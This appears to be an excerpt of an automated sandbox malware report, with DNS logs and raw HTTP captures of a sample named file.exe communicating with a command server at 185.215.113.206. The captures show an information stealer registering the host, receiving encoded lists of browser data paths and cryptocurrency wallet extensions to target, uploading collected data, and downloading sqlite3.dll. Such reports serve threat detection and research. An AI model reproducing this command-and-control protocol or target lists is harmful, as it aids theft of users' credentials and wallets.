Nov 12, 2024 00:07:36.730809927 CET	1.1.1.1	192.168.2.5	0xaebb	Name error (3)	necklacedmny.store	none	none	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:07:36.757486105 CET	1.1.1.1	192.168.2.5	0x645c	Name error (3)	founpiuer.store	none	none	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:07:36.786343098 CET	1.1.1.1	192.168.2.5	0x16ed	Name error (3)	navygenerayk.store	none	none	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:07:36.841995955 CET	1.1.1.1	192.168.2.5	0x9727	Name error (3)	scriptyprefej.store	none	none	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:07:36.851443052 CET	1.1.1.1	192.168.2.5	0xecee	No error (0)	steamcommunity.com		23.197.127.21	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:08:02.406528950 CET	1.1.1.1	192.168.2.5	0x5d	Name error (3)	presticitpo.store	none	none	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:08:02.434664965 CET	1.1.1.1	192.168.2.5	0x52fa	Name error (3)	crisiwarny.store	none	none	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:08:02.462933064 CET	1.1.1.1	192.168.2.5	0xabd4	Name error (3)	fadehairucw.store	none	none	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:08:02.490534067 CET	1.1.1.1	192.168.2.5	0x49c4	Name error (3)	thumbystriw.store	none	none	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:08:02.517445087 CET	1.1.1.1	192.168.2.5	0xd8ed	Name error (3)	necklacedmny.store	none	none	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:08:02.544243097 CET	1.1.1.1	192.168.2.5	0xd8f3	Name error (3)	founpiuer.store	none	none	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:08:02.571732998 CET	1.1.1.1	192.168.2.5	0x7122	Name error (3)	navygenerayk.store	none	none	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:08:02.598237038 CET	1.1.1.1	192.168.2.5	0x9f06	Name error (3)	scriptyprefej.store	none	none	A (IP address)	IN (0x0001)	false
Nov 12, 2024 00:08:02.608105898 CET	1.1.1.1	192.168.2.5	0x6d37	No error (0)	steamcommunity.com		23.197.127.21	A (IP address)	IN (0x0001)	false
2024-11-11 23:06:25 UTC	172.64.41.3	192.168.2.5	0x0	No error (0)	assets.msn.com	assets.msn.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)	true
2024-11-11 23:06:25 UTC	172.64.41.3	192.168.2.5	0x0	No error (0)	assets.msn.com	assets.msn.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)	true
2024-11-11 23:07:25 UTC	162.159.61.3	192.168.2.5	0x0	No error (0)	ntp.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	true
2024-11-11 23:07:25 UTC	162.159.61.3	192.168.2.5	0x0	No error (0)	ntp.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	true

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	185.215.113.206	80	3724	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 00:06:03.384345055 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Nov 12, 2024 00:06:04.023286104 CET	203	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:03 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 12, 2024 00:06:04.031174898 CET	412	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AEHIJKKFHIEGCBGCAFIJ Host: 185.215.113.206 Content-Length: 210 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 45 48 49 4a 4b 4b 46 48 49 45 47 43 42 47 43 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 30 43 36 45 43 41 31 33 38 39 41 32 39 31 39 33 31 34 35 38 0d 0a 2d 2d 2d 2d 2d 2d 41 45 48 49 4a 4b 4b 46 48 49 45 47 43 42 47 43 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 41 45 48 49 4a 4b 4b 46 48 49 45 47 43 42 47 43 41 46 49 4a 2d 2d 0d 0a Data Ascii: ------AEHIJKKFHIEGCBGCAFIJContent-Disposition: form-data; name="hwid"80C6ECA1389A291931458------AEHIJKKFHIEGCBGCAFIJContent-Disposition: form-data; name="build"mars------AEHIJKKFHIEGCBGCAFIJ--
Nov 12, 2024 00:06:04.246195078 CET	407	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:04 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 180 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6a 55 32 4d 6a 56 6a 5a 54 52 69 4f 57 59 30 5a 57 4d 34 4e 47 5a 68 4d 7a 45 31 5a 6d 4d 34 4f 57 45 79 59 57 4d 30 59 6a 68 6d 4f 57 59 34 4f 44 63 7a 4d 44 64 6b 4d 6a 63 78 5a 6a 4e 6a 4d 6d 49 77 59 57 5a 6a 4e 6d 4a 68 4d 57 51 77 4d 7a 45 30 4e 7a 4d 30 4d 6a 4d 79 59 7a 67 32 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d Data Ascii: YjU2MjVjZTRiOWY0ZWM4NGZhMzE1ZmM4OWEyYWM0YjhmOWY4ODczMDdkMjcxZjNjMmIwYWZjNmJhMWQwMzE0NzM0MjMyYzg2fHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
Nov 12, 2024 00:06:04.248428106 CET	470	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JDAEHJJECAEGCAAAAEGI Host: 185.215.113.206 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 44 41 45 48 4a 4a 45 43 41 45 47 43 41 41 41 41 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 35 36 32 35 63 65 34 62 39 66 34 65 63 38 34 66 61 33 31 35 66 63 38 39 61 32 61 63 34 62 38 66 39 66 38 38 37 33 30 37 64 32 37 31 66 33 63 32 62 30 61 66 63 36 62 61 31 64 30 33 31 34 37 33 34 32 33 32 63 38 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 41 45 48 4a 4a 45 43 41 45 47 43 41 41 41 41 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 41 45 48 4a 4a 45 43 41 45 47 43 41 41 41 41 45 47 49 2d 2d 0d 0a Data Ascii: ------JDAEHJJECAEGCAAAAEGIContent-Disposition: form-data; name="token"b5625ce4b9f4ec84fa315fc89a2ac4b8f9f887307d271f3c2b0afc6ba1d0314734232c86------JDAEHJJECAEGCAAAAEGIContent-Disposition: form-data; name="message"browsers------JDAEHJJECAEGCAAAAEGI--
Nov 12, 2024 00:06:04.450782061 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:04 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 2028 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 51 7a 70 63 55 48 4a 76 5a 33 4a 68 62 53 42 47 61 57 78 6c 63 31 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 58 45 46 77 63 47 78 70 59 32 46 30 61 57 39 75 58 48 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 44 42 38 51 32 68 79 62 32 31 70 64 57 31 38 58 45 4e 6f 63 6d 39 74 61 58 56 74 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 77 77 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 4d 48 [TRUNCATED] Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8QzpcUHJvZ3JhbSBGaWxlc1xHb29nbGVcQ2hyb21lXEFwcGxpY2F0aW9uXHxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfDB8Q2hyb21pdW18XENocm9taXVtXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXwwfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8MHxUb3JjaHxcVG9yY2hcVXNlciBEYXRhfGNocm9tZXwwfDB8Vml2YWxkaXxcVml2YWxkaVxVc2VyIERhdGF8Y2hyb21lfHZpdmFsZGkuZXhlfCVMT0NBTEFQUERBVEElXFZpdmFsZGlcQXBwbGljYXRpb25cfENvbW9kbyBEcmFnb258XENvbW9kb1xEcmFnb25cVXNlciBEYXRhfGNocm9tZXwwfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGVwaWMuZXhlfCVMT0NBTEFQUERBVEElXEVwaWMgUHJpdmFjeSBCcm93c2VyXEFwcGxpY2F0aW9uXHxDb2NDb2N8XENvY0NvY1xCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8YnJvd3Nlci5leGV8QzpcUHJvZ3JhbSBGaWxlc1xDb2NDb2NcQnJvd3NlclxBcHBsaWNhdGlvblx8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDOlxQcm9ncmFtIEZpbGVzXEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxBcHBsaWNhdGlvblx8Q2Vu
Nov 12, 2024 00:06:04.450795889 CET	1020	IN	Data Raw: 64 43 42 43 63 6d 39 33 63 32 56 79 66 46 78 44 5a 57 35 30 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 4a 55 78 50 51 30 46 4d 51 56 42 51 52 45 Data Ascii: dCBCcm93c2VyfFxDZW50QnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8JUxPQ0FMQVBQREFUQSVcQ2VudEJyb3dzZXJcQXBwbGljYXRpb25cfDdTdGFyfFw3U3Rhclw3U3RhclxVc2VyIERhdGF8Y2hyb21lfDB8MHxDaGVkb3QgQnJvd3NlcnxcQ2hlZG90XFVzZXIgRGF0YXxjaHJvbWV8MHwwfE1pY3Jvc29
Nov 12, 2024 00:06:04.452181101 CET	469	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KEGDBFIJKEBGIDGDHCGC Host: 185.215.113.206 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 45 47 44 42 46 49 4a 4b 45 42 47 49 44 47 44 48 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 35 36 32 35 63 65 34 62 39 66 34 65 63 38 34 66 61 33 31 35 66 63 38 39 61 32 61 63 34 62 38 66 39 66 38 38 37 33 30 37 64 32 37 31 66 33 63 32 62 30 61 66 63 36 62 61 31 64 30 33 31 34 37 33 34 32 33 32 63 38 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 44 42 46 49 4a 4b 45 42 47 49 44 47 44 48 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 44 42 46 49 4a 4b 45 42 47 49 44 47 44 48 43 47 43 2d 2d 0d 0a Data Ascii: ------KEGDBFIJKEBGIDGDHCGCContent-Disposition: form-data; name="token"b5625ce4b9f4ec84fa315fc89a2ac4b8f9f887307d271f3c2b0afc6ba1d0314734232c86------KEGDBFIJKEBGIDGDHCGCContent-Disposition: form-data; name="message"plugins------KEGDBFIJKEBGIDGDHCGC--
Nov 12, 2024 00:06:04.654154062 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:04 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 7116 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED] Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
Nov 12, 2024 00:06:04.654179096 CET	1236	IN	Data Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29
Nov 12, 2024 00:06:04.654198885 CET	424	IN	Data Raw: 66 47 52 75 5a 32 31 73 59 6d 78 6a 62 32 52 6d 62 32 4a 77 5a 48 42 6c 59 32 46 68 5a 47 64 6d 59 6d 4e 6e 5a 32 5a 71 5a 6d 35 74 66 44 46 38 4d 48 77 77 66 45 74 6c 5a 58 42 6c 63 69 42 58 59 57 78 73 5a 58 52 38 62 48 42 70 62 47 4a 75 61 57 Data Ascii: fGRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfDF8MHwwfEtlZXBlciBXYWxsZXR8bHBpbGJuaWlhYmFja2RqY2lvbmtvYmdsbWRkZmJjam98MXwwfDB8U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWd
Nov 12, 2024 00:06:04.654220104 CET	1236	IN	Data Raw: 61 6d 39 75 59 6d 5a 69 5a 32 46 76 59 33 77 78 66 44 42 38 4d 48 78 48 62 32 4a 35 66 47 70 75 61 32 56 73 5a 6d 46 75 61 6d 74 6c 59 57 52 76 62 6d 56 6a 59 57 4a 6c 61 47 46 73 62 57 4a 6e 63 47 5a 76 5a 47 70 74 66 44 46 38 4d 48 77 77 66 46 Data Ascii: am9uYmZiZ2FvY3wxfDB8MHxHb2J5fGpua2VsZmFuamtlYWRvbmVjYWJlaGFsbWJncGZvZGptfDF8MHwwfFJvbmluIFdhbGxldHxram1vb2hsZ29rY2NvZGljampmZWJmb21sYmxqZ2Zoa3wxfDB8MHxCeW9uZXxubGdiaGRmZ2RoZ2JpYW1mZGZtYmlrY2RnaGlkb2FkZHwxfDB8MHxPbmVLZXl8am5tYm9iam1obG5nb2VmYWl
Nov 12, 2024 00:06:04.654231071 CET	1236	IN	Data Raw: 5a 32 52 6f 59 57 78 74 59 32 35 6d 61 32 78 72 66 44 46 38 4d 48 77 77 66 45 46 31 64 47 68 6c 62 6e 52 70 59 32 46 30 62 33 4a 38 59 6d 68 6e 61 47 39 68 62 57 46 77 59 32 52 77 59 6d 39 6f 63 47 68 70 5a 32 39 76 62 32 46 6b 5a 47 6c 75 63 47 Data Ascii: Z2RoYWxtY25ma2xrfDF8MHwwfEF1dGhlbnRpY2F0b3J8YmhnaG9hbWFwY2RwYm9ocGhpZ29vb2FkZGlucGtiYWl8MXwwfDB8QXV0aHl8Z2FlZG1qZGZtbWFoaGJqZWZjYmdhb2xoaGFubGFvbGJ8MXwwfDB8RU9TIEF1dGhlbnRpY2F0b3J8b2VsamRsZHBubWRiY2hvbmllbGlkZ29iZGRmZmZsYWx8MXwwfDB8R0F1dGggQXV
Nov 12, 2024 00:06:04.654242039 CET	424	IN	Data Raw: 49 46 64 68 62 47 78 6c 64 48 78 6f 59 6d 4a 6e 59 6d 56 77 61 47 64 76 61 6d 6c 72 59 57 70 6f 5a 6d 4a 76 62 57 68 73 62 57 31 76 62 47 78 77 61 47 4e 68 5a 48 77 78 66 44 42 38 4d 48 78 53 59 57 6c 75 59 6d 39 33 49 46 64 68 62 47 78 6c 64 48 Data Ascii: IFdhbGxldHxoYmJnYmVwaGdvamlrYWpoZmJvbWhsbW1vbGxwaGNhZHwxfDB8MHxSYWluYm93IFdhbGxldHxvcGZnZWxtY21iaWFqYW1lcG5tbG9pamJwb2xlaWFtYXwxfDB8MHxOaWdodGx5IFdhbGxldHxmaWlrb21tZGRiZWNjYW9pY29lam9uaWFtbW5hbGtmYXwxfDB8MHxFY3RvIFdhbGxldHxiZ2pvZ3BvaWRlamRlbWd
Nov 12, 2024 00:06:04.654581070 CET	1236	IN	Data Raw: 62 6e 52 70 5a 58 49 67 56 32 46 73 62 47 56 30 66 47 74 77 63 47 5a 6b 61 57 6c 77 63 47 68 6d 59 32 4e 6c 62 57 4e 70 5a 32 35 6f 61 57 5a 77 61 6d 74 68 63 47 5a 69 61 57 68 6b 66 44 46 38 4d 48 77 77 66 46 4e 68 5a 6d 56 51 59 57 78 38 62 47 Data Ascii: bnRpZXIgV2FsbGV0fGtwcGZkaWlwcGhmY2NlbWNpZ25oaWZwamthcGZiaWhkfDF8MHwwfFNhZmVQYWx8bGdtcGNwZ2xwbmdkb2FsYmdlb2xkZWFqZmNsbmhhZmF8MXwwfDB8U3ViV2FsbGV0IC0gUG9sa2Fkb3QgV2FsbGV0fG9uaG9nZmplYWNuZm9vZmtmZ3BwZGxibWxtbnBsZ2JufDF8MHwwfEZsdXZpIFdhbGxldHxtbW1
Nov 12, 2024 00:06:04.654592991 CET	316	IN	Data Raw: 62 57 6c 6f 62 6d 52 74 62 57 4e 6b 59 57 35 68 59 32 39 73 62 6d 68 38 4d 58 77 77 66 44 42 38 51 6d 6c 30 5a 32 56 30 49 46 64 68 62 47 78 6c 64 48 78 71 61 57 6c 6b 61 57 46 68 62 47 6c 6f 62 57 31 6f 5a 47 52 71 5a 32 4a 75 59 6d 64 6b 5a 6d Data Ascii: bWlobmRtbWNkYW5hY29sbmh8MXwwfDB8Qml0Z2V0IFdhbGxldHxqaWlkaWFhbGlobW1oZGRqZ2JuYmdkZmZsZWxvY3Bha3wxfDB8MHxUT04gV2FsbGV0fG5waHBscGdvYWtoaGpjaGtraG1pZ2dha2lqbmtoZm5kfDF8MHwwfE15VG9uV2FsbGV0fGZsZGZwZ2lwZm5jZ25kZm9sY2JrZGVla25iYmJuaGNjfDF8MHwwfFVuaXN
Nov 12, 2024 00:06:04.656421900 CET	470	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IEGCBFHJDHJJKFIDBGIJ Host: 185.215.113.206 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 45 47 43 42 46 48 4a 44 48 4a 4a 4b 46 49 44 42 47 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 35 36 32 35 63 65 34 62 39 66 34 65 63 38 34 66 61 33 31 35 66 63 38 39 61 32 61 63 34 62 38 66 39 66 38 38 37 33 30 37 64 32 37 31 66 33 63 32 62 30 61 66 63 36 62 61 31 64 30 33 31 34 37 33 34 32 33 32 63 38 36 0d 0a 2d 2d 2d 2d 2d 2d 49 45 47 43 42 46 48 4a 44 48 4a 4a 4b 46 49 44 42 47 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 49 45 47 43 42 46 48 4a 44 48 4a 4a 4b 46 49 44 42 47 49 4a 2d 2d 0d 0a Data Ascii: ------IEGCBFHJDHJJKFIDBGIJContent-Disposition: form-data; name="token"b5625ce4b9f4ec84fa315fc89a2ac4b8f9f887307d271f3c2b0afc6ba1d0314734232c86------IEGCBFHJDHJJKFIDBGIJContent-Disposition: form-data; name="message"fplugins------IEGCBFHJDHJJKFIDBGIJ--
Nov 12, 2024 00:06:04.857980013 CET	335	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:04 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
Nov 12, 2024 00:06:04.875118971 CET	203	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GHJDGDBFCBKFHJKFHCBK Host: 185.215.113.206 Content-Length: 5747 Connection: Keep-Alive Cache-Control: no-cache
Nov 12, 2024 00:06:04.875190020 CET	5747	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 44 47 44 42 46 43 42 4b 46 48 4a 4b 46 48 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 35 36 32 35 63 Data Ascii: ------GHJDGDBFCBKFHJKFHCBKContent-Disposition: form-data; name="token"b5625ce4b9f4ec84fa315fc89a2ac4b8f9f887307d271f3c2b0afc6ba1d0314734232c86------GHJDGDBFCBKFHJKFHCBKContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Nov 12, 2024 00:06:05.584125996 CET	202	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:04 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 12, 2024 00:06:05.846750021 CET	94	OUT	GET /68b591d6548ec281/sqlite3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
